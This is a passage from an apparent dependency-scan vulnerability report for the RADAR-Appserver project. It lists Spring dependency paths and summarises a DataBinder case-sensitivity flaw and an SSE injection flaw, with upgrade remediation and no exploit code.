Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
Overview
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.
Note:
The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.
This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
Remediation
Upgrade org.springframework:spring-context to version 6.1.14 or higher.
References
low severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.
Note:
The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.
This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.
Remediation
Upgrade org.springframework:spring-web to version 6.1.14 or higher.
References
low severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'). The vulnerability exists in the handling of Server-Sent Events (SSE) when streaming plain text data. An attacker can inject crafted data into the event stream, breaking message boundaries and corrupting the stream delivered to other clients. By controlling streamed content, an attacker can manipulate how subsequent events are parsed by the client, potentially altering application state or injecting misleading data.
Note:
This is only exploitable if the application streams attacker-controlled data via SSE using unstructured/plain-text messages instead of a structured format (e.g., JSON).
Remediation
Upgrade org.springframework:spring-web to version 6.2.17, 7.0.6 or higher.